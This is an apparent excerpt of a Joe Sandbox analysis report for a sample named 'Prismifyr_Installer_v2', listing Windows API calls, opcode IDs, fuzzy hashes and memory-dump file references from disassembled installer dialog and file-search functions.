                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                                          • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                                                                                          • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000028,?,00000001,00404091), ref: 00404274
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                          • Opcode ID: 916ba585e608d634958797641490031ceb4b368d387894d1e0aab50b7c43ae9e
                                                                                                                                                                                                                          • Instruction ID: 80b1fa8ab317a3fb83bf0bb9afc1fcb2ede285a6b5c9b7890d3d6fe7da01b763
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 916ba585e608d634958797641490031ceb4b368d387894d1e0aab50b7c43ae9e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69B092361C4600AAEE118B50DE49F497A62E7A4702F008138B244640B0CAB200E0DB09
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,0040402A), ref: 0040425D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                                                                          • Opcode ID: ea082ecd867c03a11dfd78164402b3a9c9d6e2ba96aa803d9d5c73deeff3904d
                                                                                                                                                                                                                          • Instruction ID: 6a6b83ba7992c3eb947fe44f0607646ae594aefa1fc7371f7d6a783f6fb0b7b0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea082ecd867c03a11dfd78164402b3a9c9d6e2ba96aa803d9d5c73deeff3904d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4EA002754445019BCF015B50DF098057A61F7A4701B114479B5555103596314860EB19
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404CB6
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404CC1
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D0B
                                                                                                                                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404D1E
                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000FC,00405296), ref: 00404D37
                                                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D4B
                                                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D5D
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404D73
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D7F
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D91
                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00404D94
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404DBF
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DCB
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E61
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E8C
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EA0
                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404ECF
                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EDD
                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404EEE
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FEB
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405050
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405065
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405089
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050A9
                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 004050BE
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 004050CE
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405147
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 004051F0
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051FF
                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0040521F
                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 0040526D
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00405278
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 0040527F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                          • String ID: $M$N
                                                                                                                                                                                                                          • API String ID: 1638840714-813528018
                                                                                                                                                                                                                          • Opcode ID: 21818fa51d6b588aeca07265a4b81a3a3b935111f3ce34767c97606af49217ff
                                                                                                                                                                                                                          • Instruction ID: 350e9793ba1948ff1935c4af006ad7833f39553502bf8ecbcf91bc97059cc7bb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 21818fa51d6b588aeca07265a4b81a3a3b935111f3ce34767c97606af49217ff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C0281B0900209AFDB10DFA4DD85AAE7BB5FB44314F10417AF614BA2E1C7799D92CF58
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404771
                                                                                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 0040479B
                                                                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040484C
                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404857
                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(Remove folder: ,00450248,00000000,?,?), ref: 00404889
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,Remove folder: ), ref: 00404895
                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048A7
                                                                                                                                                                                                                            • Part of subcall function 00405904: GetDlgItemTextW.USER32(?,?,00002000,004048DE), ref: 00405917
                                                                                                                                                                                                                            • Part of subcall function 0040654E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,004DF000,004DF000,004CB000,0040336A,004DF000,76233420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                                                                                                                                                                                                            • Part of subcall function 0040654E: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
                                                                                                                                                                                                                            • Part of subcall function 0040654E: CharNextW.USER32(?,00000000,004DF000,004DF000,004CB000,0040336A,004DF000,76233420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                                                                                                                                                                                                            • Part of subcall function 0040654E: CharPrevW.USER32(?,?,004DF000,004DF000,004CB000,0040336A,004DF000,76233420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                                                                                                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(00440218,?,?,0000040F,?,00440218,00440218,?,00000001,00440218,?,?,000003FB,?), ref: 0040496A
                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404985
                                                                                                                                                                                                                            • Part of subcall function 00404ADE: lstrlenW.KERNEL32(00450248,00450248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                                                                                                                                                                                            • Part of subcall function 00404ADE: wsprintfW.USER32 ref: 00404B88
                                                                                                                                                                                                                            • Part of subcall function 00404ADE: SetDlgItemTextW.USER32(?,00450248), ref: 00404B9B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                          • String ID: <#j$A$Remove folder:
                                                                                                                                                                                                                          • API String ID: 2624150263-3851121467
                                                                                                                                                                                                                          • Opcode ID: d9ff5aa2ff53ffbe0c3723e23dc604a8a31f393e15f5d8e1a009d79f52351d08
                                                                                                                                                                                                                          • Instruction ID: aec38ac33e169681c2ce75898e964705c21f391e9d8eef84a8e49708370a7c65
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9ff5aa2ff53ffbe0c3723e23dc604a8a31f393e15f5d8e1a009d79f52351d08
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0CA173B1900208ABDB11AFA5CD45AAF77B8EF84314F10847BF605B62D1D77C99418F6D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1974802433-0
                                                                                                                                                                                                                          • Opcode ID: 54b460b755f9bf27e46ac1d39a8a1124328dc74cebdc85c095498b08f8838b6a
                                                                                                                                                                                                                          • Instruction ID: 11d43fc069a5ea90b0fea77c2c23c6da8a8dfc92bb9fdb714ff4c9b8b345b962
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54b460b755f9bf27e46ac1d39a8a1124328dc74cebdc85c095498b08f8838b6a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9BF08271A14104EFDB00EBA4DA499ADB378EF04314F6045BBF515F21D1DBB45D909B2A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                                                                                                                                                                          • Instruction ID: 703def0becceeecb9d8561ea32c53bcab4b84ebc773a8a1d0b412cad538f794c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
